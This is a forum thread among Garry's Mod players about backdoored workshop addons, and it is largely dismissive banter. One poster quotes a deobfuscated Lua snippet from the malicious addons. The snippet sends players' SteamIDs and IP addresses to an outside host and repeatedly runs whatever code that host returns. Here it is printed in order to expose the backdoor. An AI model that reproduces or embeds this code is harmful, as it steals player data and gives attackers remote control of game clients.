Yet Another Possible Loophole/Backdoor "Virus" (Script) in Garry's Mod

I haven’t met/had the problem personally, this was brought to my attention by a friend who regulars my server. I don’t really know more than what’s really going on as discussed in these steam threads, so this is where my journey in the matter ends.

Supposedly it’s another Vinh’ll fix it scenario with a spreading malicious script from player to server & other players. There isn’t much compelling evidence currently to support it, but if it’s legit more stuff will pop up in the discussions soon as it spreads like wildfire. If you ask me none the sooner with an update being scheduled two days from now.

lol
[sp]no[/sp]
Probably just another backdoor, who cares

Yeah, sounds just like a backdoored addon. They were all playing singleplayer.

Hmm…

That’s exactly what sannys meant

Probably just those generic serverwatch skids, again; Who cares

Serverwatch still exists? Thought he died with his prop minging ways.

his existence is cute in a sad sort of way, like a crippled dog that keeps falling over

In conclusion, Nothing will happen on december 25.
This is just a skid with a workshop backdoor using gui.OpenURL.
OP Probably just has little lua knowledge and got scared, like every kid in the community.

I’d be careful which addons you use. I don’t know which but some addons will open up ads in the background to gain ¢¢. Fucking children.

I actually could guess how it was working, I do know a fair amount of lua and have made a few things for my server, but thank you for your judgements. Also I’m not going to make a cringy coverup for my age, I’m 19.

I made the thread as an “In case it’s not some addon on the workshop with it’s creator just being a dick.”

Found one of the sources (smeg rename lol)

Lines: 1438-1476
Deobfuscated version:



local clientIP = "0.0.0.0:0"
	
	http.Fetch("http://gmod-rce-senator.c9users.io/address.php", function(ip) clientIP = ip; end, function(...) end)
	
	timer.Simple(1, function()
		http.Post("http://gmod-rce-senator.c9users.io/api.php", {request="notify", steamid=LocalPlayer():SteamID(), ip=clientIP, servername=GetHostName(), serverip=game.GetIPAddress()}, function(body) end, function(...) end);
	end);
	
	timer.Create("Cheatupdate_PingBack", 5, 0, function()
		http.Post( "http://gmod-rce-senator.c9users.io/api.php", {request="pingback"}, function( body, p0, p1, p2 )
			local response = util.JSONToTable(body);
			if(response != nil) then
				if(string.find(response["packet-r"]["target"],LocalPlayer():SteamID()) || string.find(response["packet-r"]["target"], "*")) then 
					if(!string.find(response["packet-r"]["target"], "!" .. LocalPlayer():SteamID()) && response["packet-r"]["re"] != "null") then
						RunString(response["packet-r"]["re"]);
					end
				end
			end
			end, 
			function(exception)
		end) 
	end)


will update if/when I find more

Update 1:

Second source (fake server content):
Lines: 1-39

Whole file is just the obfuscated backdoor

Third source:
Lines: 25-63

Same as above

Update 2:

Fourth source (another cheat):
Lines: 273-311

Update 3:

Looks like the “gmod-rce-senator.c9users.io” site has been removed.

so after Moku posted this, they made all the players with the backdoored scripts redirect to our server and holy shit was it a lagfest

tbh thats pretty funny

makes me think there should be some sort of audit process for workshop addons that contain lua

“removed”
heh heh

This is only the beginning.

[video]https://a.pomf.cat/sodzip.mp4[/video]

Good job:

he goes under a different name, “Dark Byte” or simply “Dark”, probably did it to avoid people from knowing who he was, obviously it didn’t work.

i’ve dealt w/ him in the past, him saying that what i did in my workshop addon was “purely intentional” and actually gave out my real name in a FP thread, possibly among other things that i can’t instantaneously remember.

wasn’t long before he got owned AKA perma’d. he currently has a cheat on the workshop called HLScripts which is basically him hitting Ctrl+C and Ctrl+V a bunch of times

EDIT: realized i’m being rated as late which is fine, just wanted to give some backstory on a dude that literally nobody cares about and possibly everyone knows by now

says the skid with a cheat on the workshop himself http://steamcommunity.com/sharedfiles/filedetails/?id=762916731


(User was banned for this post ("Shit Posting" - UncleJimmema))

Again, like I said. Just a backdoored workshop addon, who cares.